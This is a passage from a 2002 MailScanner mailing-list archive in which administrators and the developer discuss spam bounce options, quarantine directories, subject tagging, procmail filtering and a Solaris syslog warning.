NFS, which I certainly am not prepared to get into. So "sorry" on that one. >Also, I would love to be able to scan all outgoing mail but only selected >incoming mail. The reason is that I would like to try and protect the rest of >the interent from all my virused users but require the people on my system to >pay to be protected. This may seem backwards but I have to recoup the cost of >the virus engines from somewhere. Does anyone else think this would be good >or am I off my rocker? The new version can do that already. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Wed Sep 11 15:25:59 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:34 2006 Subject: MAILSCANNER: valites@GENESEO.EDU left the list Message-ID: <200209111426.PAA26785@magpie.ecs.soton.ac.uk> Wed, 11 Sep 2002 15:25:59 "Mark T. Valites" has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From hciss at HCIWS.COM Wed Sep 11 15:42:21 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions References: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> Message-ID: <003101c259a1$72f8a620$6401a8c0@matthew> > >Bounce the message referencing the blacklist if SA doesn't qualify it as > >spam. Don't bounce when SA says it's spam. > > I'm starting to regret this.... > I need to keep it relatively simple or else no-one will ever work out how > to use it, which is worse than doing nothing. I've got a fairly clear idea > of what I want to do, which will hopefully keep most of you happy most of > the time. If it detected as spam, add "bounce" to the list of things you > can do, but allow you to put the contents of the X-MailScanner-SpamCheck > header in the message (excluding all the SA rule hits). > > I hope that's good enough for most of you :-) Ugh, I here you. Originally I just wanted a plain bounce that looked like it was done with sendmail and the connection was rejected due to ordb or spamcop. I don't want to use it with SpamAssassin really. So many other good idea's now. Still I think its best to keep it simple. I have never heard of more then one email address in the from line. I would say just delete it if so. If it is actually a forged from address and we bounce to some innocent email address there is not much we can do, it happens. The guy is going to get lots of nasty emails due to the spam anyway. No different then a virus forging the from line. Normally on bounces there is a form letter that states what went wrong and the original message is sent as an attachment. That sounds good to me. Matt From Matthew_doherty at DATAWATCH.COM Wed Sep 11 16:47:28 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:34 2006 Subject: MailScanner logging suggestions, which were considered? Message-ID: Many people gave suggestions about mailscanner logging. Which ones did you consider? And the ones you didn't, why? Thanks! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020911/6a826847/attachment.html From jim at ENTROPHY-FREE.NET Wed Sep 11 18:40:35 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions In-Reply-To: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> References: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> Message-ID: <1031766038.2349.33.camel@wilowisp.dynetics.com> On Wed, 2002-09-11 at 04:02, Julian Field wrote: > At 08:45 11/09/2002, you wrote: > >On Tue, 10 Sep 2002 23:31:59 -0500, you wrote: > > > > >> It should still be possible to whitelist ones own IP's and the > > >> postmaster/abuse/admin accounts. > > >> > > >Agreed, but I think it best to be judicious in generating a bounce for a > > >black list hit. My preference is to only send the bounce back if it > > >looks like a legitimate email message that just happens to originate > > >from a black listed site. Spammers who take advantage of an open relay > > >or those that fall for the "make money with your computer at home" could > > >care less if the get a bounce (and most will never be delivered anyway). > > >It's the innocent user that just happens to be at a black listed site > > >that I'm concerned about. > > > >To make it even more difficult: > > > >Bounce the message referencing the blacklist if SA doesn't qualify it as > >spam. Don't bounce when SA says it's spam. > > I'm starting to regret this.... > I need to keep it relatively simple or else no-one will ever work out how > to use it, which is worse than doing nothing. I've got a fairly clear idea > of what I want to do, which will hopefully keep most of you happy most of > the time. If it detected as spam, add "bounce" to the list of things you > can do, but allow you to put the contents of the X-MailScanner-SpamCheck > header in the message (excluding all the SA rule hits). > Are you saying that an SA result and an RBL result will simply be treated as "spam" w/respect to bounces? Or can one specify one action for an RBL result and a different one for an SA result? In my opinion the later is what is needed to be able to notify users of why their message wasn't delivered. I've deployed a number of instances of MailScanner. In all cases so far the client, when told of the configuration choices, has elected to never produce bounces for SA or virus results to the Internet at large. They all elect to have local users notified about virus infections. Furthermore, all but one of the clients uses MailScanner in a "primarily advisory role" w/respect to spam. In that configuration MailScanner has a HighScore set somewhere at 15 or more (and discards those matches). The SA "required" is usually set down around 3 or 4. It then becomes the client responsibility for disposition of messages marked as being spam. Per-user filtering of the resultant stream is then done server-side with either Cyrus Sieve or procmail filters or client-side with whatever the client supports for filters. To make filtering easier I've developed a modification for MailScanner the does something along the lines of what MimeDefang does. My mod causes the spamheader to have "(###...) at the beginning followed by the normal spamheader. There's a "#" for each integer part of the SA score (a score of 6.2 results in (######), up to 20 "#". The Sieve, procmail, or client filter can then do "if (######" discard. That's much easier than picking out score from the spam header. So, for my clients having a single action for "spam" (either from RBL or SA) isn't a good option. I don't know about others, but without exception all of these clients have been very opposed to any modification of the subject header. Yes, I could set up the MTA to do the RBL checks. But that's not very flexible and it's hard to "white list" someone that you really need mail from and whose ISP or organization has become black listed. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From jkf at ecs.soton.ac.uk Wed Sep 11 20:35:30 2002 From: jkf at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions In-Reply-To: <1031766038.2349.33.camel@wilowisp.dynetics.com> References: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020911203108.02291810@imap.ecs.soton.ac.uk> At 18:40 11/09/2002, you wrote: >Are you saying that an SA result and an RBL result will simply be >treated as "spam" w/respect to bounces? Or can one specify one action >for an RBL result and a different one for an SA result? In my opinion >the later is what is needed to be able to notify users of why their >message wasn't delivered. Done. >I've deployed a number of instances of MailScanner. In all cases so far >the client, when told of the configuration choices, has elected to never >produce bounces for SA or virus results to the Internet at large. They >all elect to have local users notified about virus infections. >Furthermore, all but one of the clients uses MailScanner in a "primarily >advisory role" w/respect to spam. In that configuration MailScanner has >a HighScore set somewhere at 15 or more (and discards those matches). >The SA "required" is usually set down around 3 or 4. It then becomes the >client responsibility for disposition of messages marked as being spam. >Per-user filtering of the resultant stream is then done server-side with >either Cyrus Sieve or procmail filters or client-side with whatever the >client supports for filters. To make filtering easier I've developed a >modification for MailScanner the does something along the lines of what >MimeDefang does. My mod causes the spamheader to have "(###...) at the >beginning followed by the normal spamheader. There's a "#" for each >integer part of the SA score (a score of 6.2 results in (######), up to >20 "#". The Sieve, procmail, or client filter can then do "if (######" >discard. That's much easier than picking out score from the spam header. >So, for my clients having a single action for "spam" (either from RBL or >SA) isn't a good option. I chose "*" rather than "#", but done. And no, I'm not going to bother adding a config option just to set the character. I'm sure you can cope with "*" :-) >I don't know about others, but without exception all of these clients >have been very opposed to any modification of the subject header. > >Yes, I could set up the MTA to do the RBL checks. But that's not very >flexible and it's hard to "white list" someone that you really need mail >from and whose ISP or organization has become black listed. I appreciate your feature request, but could you possibly word them a little more gently? Remember I do this for nothing, I'm not some mega-corp you can make demands of. Hope you understand. Jules -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Matthew_doherty at DATAWATCH.COM Wed Sep 11 20:57:58 2002 From: Matthew_doherty at DATAWATCH.COM (Matt Doherty) Date: Thu Jan 12 21:15:34 2006 Subject: logging Message-ID: Many people gave suggestions about mailscanner logging. Which ones did you consider? And the ones you didn't, why? Thanks! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020911/db92a3e0/attachment.html From LISTSERV at JISCMAIL.AC.UK Wed Sep 11 21:09:52 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:34 2006 Subject: MAILSCANNER: bcc5226@TDCADSL.DK requested to join Message-ID: <200209112009.VAA04110@magpie.ecs.soton.ac.uk> Wed, 11 Sep 2002 21:09:52 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Poul Kristensen . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER bcc5226@TDCADSL.DK Poul Kristensen The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+bcc5226%40TDCADSL.DK+Poul+Kristensen&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From lbergman at abi.tconline.net Wed Sep 11 21:29:36 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:34 2006 Subject: Feature, maybe misfeature In-Reply-To: <5.1.0.14.2.20020911153032.06e62a00@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020911153032.06e62a00@imap.ecs.soton.ac.uk> Message-ID: <200209111529.36149.lbergman@abi.tconline.net> > >I am searching for a way to put spam that we don't deliver into user's > > mail accounts. I think a seperate dir might make this easier only because > > I don't want to put mail containing viruses in their mail account. > > That would normally involve hairy file locking over NFS, which I certainly > am not prepared to get into. So "sorry" on that one. > Maybe I was unclear. I didn't mean put the spam directly in a user's directory. Just put it in a seperate quarantine dir from the viruses. > >Also, I would love to be able to scan all outgoing mail but only selected > >incoming mail. The reason is that I would like to try and protect the rest > > of the interent from all my virused users but require the people on my > > system to pay to be protected. This may seem backwards but I have to > > recoup the cost of the virus engines from somewhere. Does anyone else > > think this would be good or am I off my rocker? > > The new version can do that already. cool -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From mailscanner at ecs.soton.ac.uk Wed Sep 11 21:37:01 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Feature, maybe misfeature In-Reply-To: <200209111529.36149.lbergman@abi.tconline.net> References: <5.1.0.14.2.20020911153032.06e62a00@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020911153032.06e62a00@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020911213528.02402708@imap.ecs.soton.ac.uk> At 21:29 11/09/2002, you wrote: > > >I am searching for a way to put spam that we don't deliver into user's > > > mail accounts. I think a seperate dir might make this easier only because > > > I don't want to put mail containing viruses in their mail account. > > > > That would normally involve hairy file locking over NFS, which I certainly > > am not prepared to get into. So "sorry" on that one. > > >Maybe I was unclear. I didn't mean put the spam directly in a user's >directory. Just put it in a seperate quarantine dir from the viruses. The new version already does that. It will save it into a directory (where yyyymmdd is the date) ....quarantine-dir/yyyymmdd/spam so you can extract the spam for each day very easily. > > >Also, I would love to be able to scan all outgoing mail but only selected > > >incoming mail. The reason is that I would like to try and protect the rest > > > of the interent from all my virused users but require the people on my > > > system to pay to be protected. This may seem backwards but I have to > > > recoup the cost of the virus engines from somewhere. Does anyone else > > > think this would be good or am I off my rocker? > > > > The new version can do that already. >cool -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jim at ENTROPHY-FREE.NET Wed Sep 11 21:51:58 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions In-Reply-To: <5.1.0.14.2.20020911203108.02291810@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020911203108.02291810@imap.ecs.soton.ac.uk> Message-ID: <1031777519.2349.77.camel@wilowisp.dynetics.com> On Wed, 2002-09-11 at 14:35, Julian Field wrote: > At 18:40 11/09/2002, you wrote: > >Are you saying that an SA result and an RBL result will simply be > >treated as "spam" w/respect to bounces? Or can one specify one action > >for an RBL result and a different one for an SA result? In my opinion > >the later is what is needed to be able to notify users of why their > >message wasn't delivered. > > Done. Very, very cool > > > I chose "*" rather than "#", but done. And no, I'm not going to bother > adding a config option just to set the character. I'm sure you can cope > with "*" :-) > I used # rather than * because some filters implement wild card or regex matching and the * has a special meaning there. So far as I know right now a # doesn't have a special meaning to any filter that I've run across. It's something to consider, and yes I'd find that to be a trivial edit... > > I appreciate your feature request, but could you possibly word them a > little more gently? Remember I do this for nothing, I'm not some mega-corp > you can make demands of. Hope you understand. > Sorry, I didn't mean to sound harsh or pushy. I guess it's a character flaw. I've been working with email systems since the days of UUCP only mail and like everyone else have been fighting a growing Spam problem. I tend to be a bit opinionated on some of the issues as a result of that history.I really do appreciate the work that you've put into this and continue to devote to it. And, if you need some "extra hands" I'd be glad to assist in any way that I can. I'm a fairly decent Perl programmer and have a good knowledge of email (esp. Sendmail). As an unsolicited testimonial to your efforts some of the places that I've deployed MailScanner were using commercial products for spam control. They weren't satisfied with the results (too many false positives and too much spam getting through) so I installed a MailScanner filter in between the commercial package and the rest of the email system. MailScanner identified about 30% of the already filtered mail stream as being possible spam with very few false positives. As a result the number of complaints from their users about Spam pretty much disappeared. Those clients are ecstatic over the results, and even more so when cost is compared and are discontinuing the use of the commercial solution. And we are talking about moderate sized mail volumes, something in the 150-180,000 messages a day inbound from the Internet. MailScanner is handling that kind of load nicely on a dedicated 2x2Gz box with 1Gb of memory. Compared to the other scanners that I've evaluated (everything from lower end commercial ones, not Brightmail it's just too pricey, through the open source variants) MailScanner is way out in front. In terms of code quality, features, and robustness nothing else that I've looked at comes close. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From mailscanner at ecs.soton.ac.uk Wed Sep 11 22:10:44 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions In-Reply-To: <1031777519.2349.77.camel@wilowisp.dynetics.com> References: <5.1.0.14.2.20020911203108.02291810@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020911203108.02291810@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020911215915.0223ec10@imap.ecs.soton.ac.uk> At 21:51 11/09/2002, you wrote: > > I chose "*" rather than "#", but done. And no, I'm not going to bother > > adding a config option just to set the character. I'm sure you can cope > > with "*" :-) > > >I used # rather than * because some filters implement wild card or regex >matching and the * has a special meaning there. So far as I know right >now a # doesn't have a special meaning to any filter that I've run >across. It's something to consider, and yes I'd find that to be a >trivial edit... Good idea, I might change it. > > I appreciate your feature request, but could you possibly word them a > > little more gently? Remember I do this for nothing, I'm not some mega-corp > > you can make demands of. Hope you understand. > > >Sorry, I didn't mean to sound harsh or pushy. You've hopefully seen my personal response by the time you see this :-) >As an unsolicited testimonial to your efforts some of the places that >I've deployed MailScanner were using commercial products for spam >control. They weren't satisfied with the results (too many false >positives and too much spam getting through) so I installed a >MailScanner filter in between the commercial package and the rest of the >email system. MailScanner identified about 30% of the already filtered >mail stream as being possible spam with very few false positives. As a >result the number of complaints from their users about Spam pretty much >disappeared. Those clients are ecstatic over the results, and even more >so when cost is compared and are discontinuing the use of the commercial >solution. And we are talking about moderate sized mail volumes, >something in the 150-180,000 messages a day inbound from the Internet. > >MailScanner is handling that kind of load nicely on a dedicated 2x2Gz >box with 1Gb of memory. Compared to the other scanners that I've >evaluated (everything from lower end commercial ones, not Brightmail >it's just too pricey, through the open source variants) MailScanner is >way out in front. In terms of code quality, features, and robustness >nothing else that I've looked at comes close. Thanks for that. Good to hear I'm displacing the commercial guys :) I wonder if it's worth setting up a "testimonials" page on the website. All comments on it would have to be attributed, as otherwise everyone will just think that I wrote them. What does anyone think? I could ask our webmaster to write me a bit of PHP to automate it too. Hopefully I'll have the first speed test result for you tomorrow, based on processing 20,000 messages on a 2x1GHz P3 box with 512Mb of RAM. It's running version 3 now. I'll pump the same dataset through version 4 in the morning (UK time). Version 4 has got a lot of testing to be done on it before I dare release it to anyone... -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From helio at HELIO.COM.BR Wed Sep 11 23:26:33 2002 From: helio at HELIO.COM.BR (Helio Silva) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions -- procmail In-Reply-To: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> References: <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> Message-ID: <5.1.1.6.2.20020911192122.055f09d0@pop.sao.terra.com.br> Hi, I think the best choice is to write some x-mailscanner-spam headers on the mail and them anyone can make you own rules with procmail. Something like this is easy to put on .procmailrc :0h * ^X-Mailscanner-Spam : rbl | (do anything you want) :0h * ^X-Mailscanner-Spam : xxxx | (do anything you want) regards H?lio S. Silva Iggy Tecnologia e Informa??o S/C Ltda. Uso Linux : http://www2.uol.com.br/info/aberto/linux Sao Paulo,SP - BRASIL helio@helio.com.br Tel +55 11 9999-2889 / 3936-4521/3032 From erich at OLYPEN.COM Wed Sep 11 23:45:22 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:34 2006 Subject: Feature, maybe misfeature In-Reply-To: <200209110915.18963.lbergman@abi.tconline.net> Message-ID: On Wed, 11 Sep 2002, Lewis Bergman wrote: > I am wondering if it would be helpful for anyone else to have spams sent to a > different directory than viruses? > > I am searching for a way to put spam that we don't deliver into user's mail > accounts. I think a seperate dir might make this easier only because I don't > want to put mail containing viruses in their mail account. I deliver mail to homedirs, i.e. $HOME/.mail and a simple .procmailrc file can arrange to deliver tagged spam to a .spam file in their homedir too, then run a second popper on say port 1110 that pops from the .spam files. Users will be able to download their spam if they want, check for false positives, etc. What I haven't got written yet is a "spamsweeper" script which lazily runs in the background at a low 19 nice priority all the time, going through all of the .spam files and deleting any message older than x days. Eric From billa at STERLING.NET Thu Sep 12 00:54:53 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:34 2006 Subject: Modify subject line? Message-ID: Using mailscanner and spamassassin, can I modify the subject field by adding [SPAM] to the subject line of spam messages and then deliver them? If so, how do you go about doing this? Thanks. From mkettler at EVI-INC.COM Thu Sep 12 01:15:20 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:34 2006 Subject: Modify subject line? In-Reply-To: Message-ID: <5.1.1.6.0.20020911201048.01649540@192.168.50.2> Not only can you do it, this is more-or-less the default for mailscanner if it's using SA. Auto-delete, etc are newer options of newer versions of Mailscanner. grep for {SPAM?} (which is the default tag) in the mailscanner.conf and all should be clear from there. change it to [SPAM] if you like. see: Spam Subject Text = {SPAM?} At 04:54 PM 9/11/2002 -0700, Bill Anderson wrote: >Using mailscanner and spamassassin, can I modify the subject field by adding >[SPAM] to the subject line of spam messages and then deliver them? If so, >how do you go about doing this? Thanks. From smohan at VSNL.COM Thu Sep 12 05:17:05 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:34 2006 Subject: Modify subject line? In-Reply-To: <5.1.1.6.0.20020911201048.01649540@192.168.50.2> Message-ID: Using [ brackets may give problems in specifying pattern match in procmail. No impossible though. Need to use /[ for bracket to be interpreted as bracket and not as pattern match option. Mohan -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Kettler Sent: 12 September 2002 05:45 To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Modify subject line? Not only can you do it, this is more-or-less the default for mailscanner if it's using SA. Auto-delete, etc are newer options of newer versions of Mailscanner. grep for {SPAM?} (which is the default tag) in the mailscanner.conf and all should be clear from there. change it to [SPAM] if you like. see: Spam Subject Text = {SPAM?} At 04:54 PM 9/11/2002 -0700, Bill Anderson wrote: >Using mailscanner and spamassassin, can I modify the subject field by adding >[SPAM] to the subject line of spam messages and then deliver them? If so, >how do you go about doing this? Thanks. From iah at DMU.AC.UK Thu Sep 12 07:27:38 2002 From: iah at DMU.AC.UK (Andy Humberston) Date: Thu Jan 12 21:15:34 2006 Subject: Solaris 7 and 3.22-12 Message-ID: Hi, Having just installed my second MailScanner and associated software, I am receiving the following error (warning) when running check_mailscanner: unix passed to setlogsock, but path not available at /var/mailscanner/bin/logger.pl line 44 Has anyone come across this before? MailScanner appears to be working correctly though ?!? Andy -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020912/bfa339ac/attachment.html From smohan at VSNL.COM Thu Sep 12 08:07:43 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:34 2006 Subject: Feature request In-Reply-To: <5.1.0.14.2.20020911110650.02449de8@imap.ecs.soton.ac.uk> Message-ID: For local domains, can mailscanner give an option of taking the local domains from /etc/mail/local-host-names. This way, whenever a domain is added, it will also be scanned. I know I can do it by creating a link but this seems more logical. Can a separate log location be created each domain for Mailscanner? maillog has smtp entries, mailscanner entries and ipop3d entries. For a large multi-domain mail server, this is useful. Can the tabs in filenames.rules.file have an alternative of commas? We would end up making lesser mistakes tabs Vs spaces. Mohan From P.G.M.Peters at civ.utwente.nl Thu Sep 12 09:05:59 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:34 2006 Subject: Feature request In-Reply-To: References: <5.1.0.14.2.20020911110650.02449de8@imap.ecs.soton.ac.uk> Message-ID: On Thu, 12 Sep 2002 12:37:43 +0530, you wrote: >For local domains, can mailscanner give an option of taking the local >domains from /etc/mail/local-host-names. This way, whenever a domain is >added, it will also be scanned. I know I can do it by creating a link but >this seems more logical. The link has the problem that using /etc/mail/virthosts too isn't possible. Because that would be a good choice for the local domains too. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From mailscanner at ecs.soton.ac.uk Thu Sep 12 09:52:52 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Solaris 7 and 3.22-12 In-Reply-To: Message-ID: <5.1.0.14.2.20020912095107.024a0dc8@imap.ecs.soton.ac.uk> At 07:27 12/09/2002, you wrote: >Having just installed my second MailScanner and associated >software, I am receiving the following error (warning) when >running check_mailscanner: > >unix passed to setlogsock, but path not available at >/var/mailscanner/bin/logger.pl line 44 MailScanner tries to open a "unix" domain socket to syslogd if it can. Looks like it can't on your system. The error message can be safely ignored, MailScanner will still work (it catches that error and carries on). If you aren't getting any syslogd output from MailScanner in your logs, then read FAQ number 1 on www.mailscanner.info. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 09:58:45 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Feature request In-Reply-To: References: <5.1.0.14.2.20020911110650.02449de8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020912095347.02408fd8@imap.ecs.soton.ac.uk> At 08:07 12/09/2002, you wrote: >For local domains, can mailscanner give an option of taking the local >domains from /etc/mail/local-host-names. This way, whenever a domain is >added, it will also be scanned. I know I can do it by creating a link but >this seems more logical. Local domain lists will now have to be included in the configuration files "properly" in the new version. I have had to remove the quick hack of allowing a single external file to specify a bunch of domain names. However, converting your local-host-names or whatever file into a MailScanner V4 config should be pretty easy, so you can just write a little script which re-creates the particular config file from your local-host-names. >Can a separate log location be created each domain for Mailscanner? maillog >has smtp entries, mailscanner entries and ipop3d entries. For a large >multi-domain mail server, this is useful. Not very easy I'm afraid. Syslogd only has a few "facility" names to use, and you have to specify the facility when you first open the syslog connection at startup, you can't quickly just change from one facility to another. Separating them within maillog is done by another string that is passed to syslogd at startup as well, so changing that is not quick either. >Can the tabs in filenames.rules.file have an alternative of commas? We would >end up making lesser mistakes tabs Vs spaces. No, because commas are perfectly valid things to have in regexp patterns, and in log text. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Thu Sep 12 09:49:19 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:34 2006 Subject: Spam Actions -- procmail In-Reply-To: <5.1.1.6.2.20020911192122.055f09d0@pop.sao.terra.com.br> References: <5.1.0.14.2.20020911095913.021e8d40@imap.ecs.soton.ac.uk> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> <5.1.0.14.2.20020910203320.0223dc30@imap.ecs.soton.ac.uk> <002101c25921$533573c0$6401a8c0@matthew> <1031718719.1876.24.camel@wilowisp.entrophy-free.net> Message-ID: <5.1.0.14.2.20020912094826.024a5590@imap.ecs.soton.ac.uk> Now you mention procmail, it occurred to me that using '#' as the spam score character will make life very hard as procmail uses that to start comments. So I've changed it again to "x" which shouldn't cause any problems for anyone. At 23:26 11/09/2002, you wrote: >Hi, > >I think the best choice is to write some x-mailscanner-spam headers on the >mail and them anyone can make you own rules with procmail. > >Something like this is easy to put on .procmailrc > >:0h >* ^X-Mailscanner-Spam : rbl >| (do anything you want) > >:0h >* ^X-Mailscanner-Spam : xxxx >| (do anything you want) > > > >regards > >H?lio S. Silva >Iggy Tecnologia e Informa??o S/C Ltda. >Uso Linux : http://www2.uol.com.br/info/aberto/linux >Sao Paulo,SP - BRASIL helio@helio.com.br >Tel +55 11 9999-2889 / 3936-4521/3032 -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From marc.perea at ELECTRONIC-GROUP.COM Thu Sep 12 10:18:51 2002 From: marc.perea at ELECTRONIC-GROUP.COM (Marc Perea) Date: Thu Jan 12 21:15:34 2006 Subject: Postfix support. Message-ID: <20020912111851.5af6cee8.marc.perea@electronic-group.com> Hi everybody, Julian, is there any chance of having MailScanner working with Postfix at sight ? I mean having it working directly, not proxied like the FAQ tip. Maybe in a future release ? Maybe an unnofficial patch or another branch dedicated only to postfix (and/or another MTAs) ? Thanks in advance, Marc. From iah at DMU.AC.UK Thu Sep 12 10:20:31 2002 From: iah at DMU.AC.UK (Andy Humberston) Date: Thu Jan 12 21:15:34 2006 Subject: Solaris 7 and 3.22-12 Message-ID: > MailScanner tries to open a "unix" domain socket to syslogd > if it can. Looks like it can't on your system. The error > message can be safely ignored, MailScanner will still work > (it catches that error and carries on). If you aren't getting > any syslogd output from MailScanner in your logs, then read > FAQ number 1 on www.mailscanner.info. Thanks Julian, We are receiving syslog messages, so I will ignore the warning. Andy From LISTSERV at JISCMAIL.AC.UK Thu Sep 12 10:16:35 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:34 2006 Subject: MAILSCANNER: jkajiba@ESRF.OR.TZ requested to join Message-ID: <200209120916.KAA03399@magpie.ecs.soton.ac.uk> Thu, 12 Sep 2002 10:16:35 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from John Kajiba . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER jkajiba@ESRF.OR.TZ John Kajiba The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+jkajiba%40ESRF.OR.TZ+John+Kajiba&L=MAILSCANNER 